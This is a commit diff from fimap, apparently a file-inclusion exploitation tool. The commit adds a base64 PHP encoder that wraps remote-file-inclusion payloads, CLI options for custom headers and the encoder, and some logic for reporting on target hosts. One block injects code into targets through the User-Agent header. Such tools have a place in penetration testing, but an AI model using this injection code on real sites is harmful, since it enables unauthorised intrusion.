Commit d6d4e2c1 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Prepared scanning of headers.

parent 1ece49f6
......@@ -399,6 +399,10 @@ class codeinjector(baseClass):
if (postdata != ""):
p = "%s&%s" %(postdata, p)
code = self.doPostRequest(url, p)
if (code == None):
return(None)
#TODO: Cleanup this dirty block :)
if (code.find(testcode[1]) == -1):
self._log("Kickstarter is not present. Injecting kickstarter thru UserAgent...", self.LOG_INFO)
......@@ -473,10 +477,13 @@ class codeinjector(baseClass):
for langName, langObj in langClass.items():
print "Testing language %s..." %(langName)
c, r = langObj.generateQuiz()
enc_c = self.payload_encode(c)
if (settings["dynamic_rfi"]["mode"] == "local"):
print "Testing Local->RFI configuration..."
code = self.executeRFI(settings["dynamic_rfi"]["local"]["http_map"], "", "", c, {})
if (code == c):
if (code == enc_c):
print "Dynamic RFI works!"
for ext in langObj.getExtentions():
print "Testing %s interpreter..." %(ext)
......@@ -495,13 +502,13 @@ class codeinjector(baseClass):
code = self.executeRFI(settings["dynamic_rfi"]["ftp"]["http_map"], "", "", c, {})
if (code != None):
code = code.strip()
if (code == c):
if (code == enc_c):
print "Dynamic RFI works!"
for ext in langObj.getExtentions():
print "Testing %s interpreter..."%(ext)
#settings["dynamic_rfi"]["ftp"]["ftp_path"] = settings["dynamic_rfi"]["ftp"]["ftp_path"] + ext
code = self.executeRFI(settings["dynamic_rfi"]["ftp"]["http_map"] + ext, "", ext, c, {})
if (code == r):
if (code.find(r) != -1):
print "WARNING! Files which ends with %s will be interpreted! Fix that!"%(ext)
else:
pass # Seems to be not interpreted...
......@@ -509,6 +516,7 @@ class codeinjector(baseClass):
else:
print "Failed! Something went wrong..."
print "Code: " + code;
else:
print "Code == None. That's not good! Failed!"
else:
......@@ -579,6 +587,8 @@ class codeinjector(baseClass):
def executeRFI(self, URL, postdata, appendix, content, header):
content = self.payload_encode(content)
if (appendix == "%00"): appendix = ""
if settings["dynamic_rfi"]["mode"]=="ftp":
up = self.FTPuploadFile(content, appendix)
......@@ -594,7 +604,17 @@ class codeinjector(baseClass):
self.deleteLocalPayload(up["local"])
return(code)
def payload_encode(self, content):
if (self.config["p_rfi_encode"] != None):
if (self.config["p_rfi_encode"] == "php_b64"):
content = "<?php echo base64_decode(\"%s\"); ?>"%(base64.b64encode(content))
self._log("Encoded content: %s" %(content), self.LOG_DEBUG)
else:
self._log("Invalid RFI encoder selected!", self.LOG_WARN);
return(content)
def chooseDomains(self, OnlyExploitable=True):
choose = {}
......@@ -603,6 +623,7 @@ class codeinjector(baseClass):
header = ":: List of Domains ::"
textarr = []
doRemoteWarn = False
missingCount = 0
for n in nodes:
host = n.getAttribute("hostname")
......@@ -625,7 +646,10 @@ class codeinjector(baseClass):
else:
textarr.append("[%d] %s" %(idx, host))
idx = idx +1
else:
missingCount += 1
textarr.append("[ ] And %d hosts with no valid attack vectors."%(missingCount))
textarr.append("[q] Quit")
self.drawBox(header, textarr)
if (doRemoteWarn):
......
......@@ -250,6 +250,7 @@ if __name__ == "__main__":
config["header"] = {}
config["force-run"] = False
config["force-os"] = None
config["p_rfi_encode"] = None
doPluginsShow = False
doRFITest = False
doInternetInfo = False
......@@ -284,8 +285,8 @@ if __name__ == "__main__":
"plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=",
"googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=",
"tab-complete" , "cookie=" , "bmin=" , "bmax=" , "dot-trunc-also-unix", "multiply-term=",
"autoawesome" , "force-run" , "force-os="]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDTM:4", longSwitches)
"autoawesome" , "force-run" , "force-os=" , "rfi-encoder=", "header="]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDTM:4R:", longSwitches)
startExploiter = False
......@@ -373,6 +374,15 @@ if __name__ == "__main__":
config["p_multiply_term"] = int(v)
if (k in ("--cookie",)):
config["header"]["Cookie"] = v
if (k in ("--header",)):
head = None
value = ""
if (v.find(":") == -1):
head = v
else:
head = v.split(":")[0]
value = ":".join(v.split(":")[1:])
config["header"][head] = value
if (k in ("--bmin",)):
blind_min = int(v)
if (k in ("--bmax",)):
......@@ -381,6 +391,8 @@ if __name__ == "__main__":
config["force-run"] = True
if (k in ("--force-os",)):
config["force-os"] = v
if (k in ("--rfi-encoder")):
config["p_rfi_encode"] = v
#if (k in("-f", "--exploit-filter")):
# config["p_exploit_filter"] = v
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment